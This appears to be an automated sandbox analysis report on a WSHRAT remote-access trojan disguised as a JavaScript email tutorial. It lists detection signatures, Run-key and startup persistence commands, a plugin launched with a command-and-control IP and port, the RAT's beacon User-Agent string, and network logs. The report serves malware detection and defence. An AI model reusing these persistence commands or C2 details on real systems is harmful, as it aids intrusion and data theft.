Analysis Overview
SHA256
beedfc01af698a1413c76a35899d15b1c940c824cdf96e406c668b193bc78229
Threat Level: Known bad
The file TUTORIAL CORREO ARMADA EN TELEFONO ANDROID.js was found to be: Known bad.
Malicious Activity Summary
Wshrat family
suricata: ET MALWARE WSHRAT Credential Dump Module Download Command Inbound
suricata: ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin 1
WSHRAT
WSHRAT Payload
suricata: ET MALWARE WSHRAT CnC Checkin
Blocklisted process makes network request
Sets service image path in registry
Executes dropped EXE
Drops startup file
Checks computer location settings
Looks up external IP address via web service
Adds Run key to start application
Drops file in Windows directory
Drops file in Program Files directory
Enumerates physical storage devices
Script User-Agent
Suspicious use of AdjustPrivilegeToken
Kills process with taskkill
Modifies data under HKEY_USERS
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Enumerates system info in registry
Suspicious use of WriteProcessMemory
Suspicious use of FindShellTrayWindow
Modifies registry class
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-02-01 15:38
Signatures
WSHRAT Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Wshrat family
Analysis: behavioral1
Detonation Overview
Submitted
2022-02-01 15:38
Reported
2022-02-01 15:39
Platform
win7-en-20211208
Max time network
21s
Command Line
Signatures
Processes
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2022-02-01 15:38
Reported
2022-02-01 15:41
Platform
win10v2004-en-20220113
Max time kernel
153s
Max time network
163s
Command Line
Signatures
WSHRAT
WSHRAT Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
suricata: ET MALWARE WSHRAT CnC Checkin
suricata: ET MALWARE WSHRAT Credential Dump Module Download Command Inbound
suricata: ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin 1
Blocklisted process makes network request
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\kl-plugin.exe | N/A |
Sets service image path in registry
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\wscript.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TUTORIAL CORREO ARMADA EN TELEFONO ANDROID.js | C:\Windows\system32\wscript.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TUTORIAL CORREO ARMADA EN TELEFONO ANDROID.js | C:\Windows\System32\wscript.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\software\microsoft\windows\currentversion\run | C:\Windows\System32\wscript.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\software\microsoft\windows\currentversion\run | C:\Windows\system32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TUTORIAL CORREO ARMADA EN TELEFONO ANDROID = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\TUTORIAL CORREO ARMADA EN TELEFONO ANDROID.js\"" | C:\Windows\system32\wscript.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\software\microsoft\windows\currentversion\run | C:\Windows\System32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TUTORIAL CORREO ARMADA EN TELEFONO ANDROID = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\TUTORIAL CORREO ARMADA EN TELEFONO ANDROID.js\"" | C:\Windows\System32\wscript.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Windows\CurrentVersion\Run | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TUTORIAL CORREO ARMADA EN TELEFONO ANDROID = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\TUTORIAL CORREO ARMADA EN TELEFONO ANDROID.js\"" | C:\Windows\system32\wscript.exe | N/A |
| Key created | \REGISTRY\MACHINE\software\microsoft\windows\currentversion\run | C:\Windows\system32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TUTORIAL CORREO ARMADA EN TELEFONO ANDROID = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\TUTORIAL CORREO ARMADA EN TELEFONO ANDROID.js\"" | C:\Windows\System32\wscript.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\41f68f3a-3433-4cf2-96d5-d6406155f2b8.tmp | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220201153940.pma | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\WindowsUpdate.log | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\SoftwareDistribution\DataStore\DataStore.edb | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\SoftwareDistribution\ReportingEvents.log | C:\Windows\system32\svchost.exe | N/A |
Enumerates physical storage devices
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | WSHRAT|5C0A896F|JDQPXOPR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 1/2/2022|JavaScript-v2.0|NL:Netherlands | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\wscript.exe
wscript.exe "C:\Users\Admin\AppData\Local\Temp\TUTORIAL CORREO ARMADA EN TELEFONO ANDROID.js"
C:\Windows\System32\wscript.exe
"C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\TUTORIAL CORREO ARMADA EN TELEFONO ANDROID.js"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Roaming\TUTORIAL CORREO ARMADA EN TELEFONO ANDROID.pdf
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0x40,0x104,0x7fff7a1d46f8,0x7fff7a1d4708,0x7fff7a1d4718
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c taskkill /F /IM kl-plugin.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM kl-plugin.exe
C:\Users\Admin\AppData\Roaming\kl-plugin.exe
"C:\Users\Admin\AppData\Roaming\kl-plugin.exe" 111.90.149.115 5200 "WSHRAT|5C0A896F|JDQPXOPR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 1/2/2022|JavaScript-v2.0|NL:Netherlands" 1
C:\Windows\SysWOW64\fondue.exe
"C:\Windows\system32\fondue.exe" /enable-feature:NetFx3 /caller-name:mscoreei.dll
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,16449752899422592532,15703532662652733733,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1484 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,16449752899422592532,15703532662652733733,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2456 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2116,16449752899422592532,15703532662652733733,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2320 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\system32\FonDUE.EXE
"C:\Windows\sysnative\FonDUE.EXE" /enable-feature:NetFx3 /caller-name:mscoreei.dll
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,16449752899422592532,15703532662652733733,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2624 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,16449752899422592532,15703532662652733733,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2644 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,16449752899422592532,15703532662652733733,131072 --disable-gpu-compositing --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5364 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2116,16449752899422592532,15703532662652733733,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5480 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,16449752899422592532,15703532662652733733,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6140 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,16449752899422592532,15703532662652733733,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6168 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --field-trial-handle=2116,16449752899422592532,15703532662652733733,131072 --lang=en-US --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=6668 /prefetch:6
C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe 82cd49c1df55af3c5f7efa41d1df8173 oKiVtAUHI0eiN+pErxxmDg.0.1.0.0.0
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,16449752899422592532,15703532662652733733,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x23c,0x240,0x244,0x21c,0x10c,0x7ff77a6e5460,0x7ff77a6e5470,0x7ff77a6e5480
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,16449752899422592532,15703532662652733733,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 /prefetch:8
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2116,16449752899422592532,15703532662652733733,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5348 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2116,16449752899422592532,15703532662652733733,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1704 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,16449752899422592532,15703532662652733733,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5696 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2116,16449752899422592532,15703532662652733733,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5772 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| MY | 111.90.149.115:5200 | 111.90.149.115 | tcp |
| US | 8.8.8.8:53 | nav.smartscreen.microsoft.com | udp |
| US | 52.153.255.201:443 | nav.smartscreen.microsoft.com | tcp |
| US | 8.8.8.8:53 | smartscreen-prod.microsoft.com | udp |
| US | 20.98.16.82:443 | smartscreen-prod.microsoft.com | tcp |
| US | 20.98.16.82:443 | smartscreen-prod.microsoft.com | tcp |
| MY | 111.90.149.115:5200 | 111.90.149.115 | tcp |
| MY | 111.90.149.115:5200 | 111.90.149.115 | tcp |
| MY | 111.90.149.115:5200 | 111.90.149.115 | tcp |
| US | 8.8.8.8:53 | doughnut-snack.live | udp |
| MY | 111.90.149.115:5200 | 111.90.149.115 | tcp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.4.4:443 | dns.google | tcp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.4.4:443 | dns.google | tcp |
| US | 8.8.4.4:443 | dns.google | tcp |
| US | 8.8.4.4:443 | dns.google | tcp |
| MY | 111.90.149.115:5200 | 111.90.149.115 | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| MY | 111.90.149.115:5200 | 111.90.149.115 | tcp |
| US | 8.8.4.4:443 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 204.79.197.200:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | dns.google | udp |
| MY | 111.90.149.115:5200 | 111.90.149.115 | tcp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 131.253.33.200:443 | | tcp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 204.79.197.203:443 | | tcp |
| NL | 23.73.0.171:443 | | tcp |
| NL | 23.73.0.171:443 | | tcp |
| NL | 23.73.0.171:443 | | tcp |
| NL | 23.73.0.171:443 | | tcp |
| US | 131.253.33.203:443 | | tcp |
| FR | 2.22.22.155:443 | | tcp |
| US | 20.36.253.92:443 | | tcp |
| US | 204.79.197.200:443 | www.bing.com | tcp |
| NL | 54.192.86.39:443 | | tcp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| MY | 111.90.149.115:5200 | 111.90.149.115 | tcp |
| MY | 111.90.149.115:5200 | 111.90.149.115 | tcp |
| US | 8.8.4.4:443 | dns.google | udp |
| US | 204.79.197.219:443 | | tcp |
| NL | 23.51.68.110:443 | | tcp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 52.167.249.196:443 | settings-win.data.microsoft.com | tcp |
| MY | 111.90.149.115:5200 | 111.90.149.115 | tcp |
| MY | 111.90.149.115:5200 | 111.90.149.115 | tcp |
| US | 8.8.8.8:53 | dns.google | udp |
| MY | 111.90.149.115:5200 | 111.90.149.115 | tcp |
| MY | 111.90.149.115:5200 | 111.90.149.115 | tcp |
| MY | 111.90.149.115:5200 | 111.90.149.115 | tcp |
| MY | 111.90.149.115:5200 | 111.90.149.115 | tcp |
| MY | 111.90.149.115:5200 | 111.90.149.115 | tcp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 204.79.197.219:443 | | tcp |
| MY | 111.90.149.115:5200 | 111.90.149.115 | tcp |
| N/A | 127.0.0.1:5985 | | tcp |
| US | 52.167.249.196:443 | settings-win.data.microsoft.com | tcp |
| US | 52.167.249.196:443 | settings-win.data.microsoft.com | tcp |
